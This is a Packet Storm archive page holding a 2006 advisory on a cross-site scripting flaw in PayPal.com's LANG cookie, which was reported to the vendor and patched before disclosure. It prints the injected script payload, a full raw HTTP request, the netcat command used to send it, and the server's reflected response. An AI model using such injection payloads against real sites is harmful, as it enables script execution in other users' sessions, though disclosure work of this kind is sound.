what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

paypalXSScorry.txt

paypalXSScorry.txt
Posted Nov 7, 2006
Authored by CorryL | Site x0n3-h4ck.org

PayPal.com suffered from a cross site scripting vulnerability.

tags | exploit, xss
SHA-256 | 22d98d91409ede316d23ed907459afbc3116834d535af7e20e9bc825d40944de

paypalXSScorry.txt

Change Mirror Download

-=[--------------------ADVISORY-------------------]=-

PayPal.com

Author:CorryL x0n3-h4ck.org
-=[----------------------------------------------------]=-


-=[+] Application: PayPal.com
-=[+] Version:
-=[+] Vendor's URL: www.paypal.com
-=[+] Platform: Linux\Unix
-=[+] Bug type: XSS
-=[+] Exploitation: Remote/Local
-=[-]
-=[+] Author: CorryL ~ corryl80[at]gmail[dot]com ~
-=[+] Reference: www.x0n3-h4ck.org
-=[+] Virtual Office: http://www.kasamba.com/CorryL

..::[ Descriprion ]::..

Founded in 1998, PayPal, an eBay Company, enables any individual or business with an email address to securely, easily and quickly send and receive payments online. PayPal's service builds on the existing financial infrastructure of bank accounts and credit cards and utilizes the world's most advanced proprietary fraud prevention systems to create a safe, global, real-time payment solution.

PayPal has quickly become a global leader in online payment solutions with 100 million account members worldwide. Available in 103 countries and regions around the world, buyers and sellers on eBay, online retailers, online businesses, as well as traditional offline businesses are transacting with PayPal.


..::[ Proof Of Concept ]::..

The problem is in a contained variable on the cookies that come
saved on a system client,
I have used a small software "NetCat" for the dispatch of the application
to the web containing server the lace,
what it would allow the xss.

I have used a line of code that visualizes a small window of
containing alert of the numbers.

<ScRiPt%20%0a%0d>alert(1234567890)%3B</ScRiPt>

I have passed to the varying LANG in this way:

LANG=--><ScRiPt%20%0a%0d>alert(1234567890)%3B</ScRiPt>

this is a request, that I have passed server to the web, complete of the
code that would allow the xss:

GET / HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR
1.1.4322)
Host: www.paypal.com
Cookie:
cookie_check=yes;feel_cookie=6120302020622030202063203620776562736372206
4203020206520323120686F6D65706167652F486F6D65506167652E78736C20662030202
067203520656E5F55532068203020206920313920702F77656C2F696E6465782D6F75747
3696465206A203020206B2031362057656C636F6D65202D2050617950616C206C2030202
0;Apache=87%2E18%2E96%2E17%2E100421159849159546;KHcl0EuY7AKSMgfvHl7J5E7h
PtK=3pnRPwTbH4N6EEpxzwWWs3Mc2y2H-hH53D2MVeXyVDl4MsVrDF4cjRE3XSmD3RB714PL
N69ovbjK--4R;HaC80bwXscjqZ7KM6VOxULOB534=111-222-1933email@address.com;p
pip_signup=1;LANG=--><ScRiPt%20%0a%0d>alert(1234567890)%3B</ScRiPt>;7aMa
j2jiaNMgvUAKlwbL1LlbnqC=BCRwX6rFzy8UFpNf7im0msjTqBkC71Yeq3U8IKjQG4zGrhRy
i5YDJ7sCXUdmJRHDye3Pjm;fL2JBKjxujhcE4LvqIWvGu9H2DC=r-h3XHZ9sxeAYLHHkSjI4
rXDaIB_JYsnEcx5svkMqiEPXWXCIaM-O-gNRkcj1K4tS5pPr4xtYC_3hZUBCMQ6b4xw8Tm;t
est_cookie=CheckForPermission;HumanClickID=-1902375092086;HumanClickACTI
VE=1159849210089;HumanClickKEY=2113911440409354850;BEGINREJECT=115984951
1214ENDREJECT
Connection: Close
Pragma: no-cache

following I glue the answer of the server:

nc www.paypal.com 80 < prova.txt


HTTP/1.1 200 OK
Date: Fri, 06 Oct 2006 17:23:13 GMT
Server: Apache/1.3.33 (Unix) mod_gzip/1.3.26.1a mod_ssl/2.8.22
OpenSSL/0.9.7e
Cache-Control: private
Expires: Thu, 05 Jan 1995 22:00:00 GMT
Pragma: no-cache
Set-Cookie:
feel_cookie=61203020206220302020632036207765627363722064203620776562
736372206520323120686F6D65706167652F486F6D65506167652E78736C20662032312
0686F6D65
706167652F486F6D65506167652E78736C2067203431202D2D3E3C536352695074200A0
D3E616C65
72742831323334353637383930293B3C2F5363526950743E2068203520656E5F5553206
920313920
702F77656C2F696E6465782D6F757473696465206A20313920702F77656C2F696E64657
82D6F7574
73696465206B203020206C2031362057656C636F6D65202D2050617950616C20;
expires=Sat, 0
6-Oct-2007 17:23:14 GMT; path=/; domain=.paypal.com
Set-Cookie: Apache=87.18.110.213.321561160155393836; path=/;
expires=Sun, 28-Sep
-36 17:23:13 GMT
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<!--
Script info: script: webscr, cmd: , template: p/wel/index-outside,
date: Oct.
3, 2006 12:18:04 PDT; country: US, language: --><ScRiPt>alert(1234567890);</ScRiPt>
web version: 42.0-255538 branch: live-420_int
content version: 42.0-249796 branch: live-420_int
-->
<title>PayPal - Abort</title>

As he is able well to see the server responds and it inserts the line of
code among the output of the page, allowing the opening
of the window of alert.


We can save the answer of the server on a page in formed html
and to open her/it with an any browsers to ascertain how much I dictate,
using same NetCat, in this way:

nc www.paypal.com 80 < test.txt > aaa.html




..::[ Disclousure Timeline ]::..

[04/10/2006] - Vendor notification
[08/10/2006] - Vendor Response
[18/10/2006] - Patch relase from vendor
[04/11/2006] - Public disclousure



*********************
Alice BASIC: mail, antivirus, antispam e invio allegati fino a 2 GB!
Per maggiori informazioni vai su: http://adsl.alice.it/servizi/alicebasic.html
Login or Register to add favorites

File Archive:

June 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    0 Files
  • 2
    Jun 2nd
    0 Files
  • 3
    Jun 3rd
    18 Files
  • 4
    Jun 4th
    21 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    57 Files
  • 7
    Jun 7th
    6 Files
  • 8
    Jun 8th
    0 Files
  • 9
    Jun 9th
    0 Files
  • 10
    Jun 10th
    12 Files
  • 11
    Jun 11th
    27 Files
  • 12
    Jun 12th
    38 Files
  • 13
    Jun 13th
    16 Files
  • 14
    Jun 14th
    14 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    0 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    0 Files
  • 20
    Jun 20th
    0 Files
  • 21
    Jun 21st
    0 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close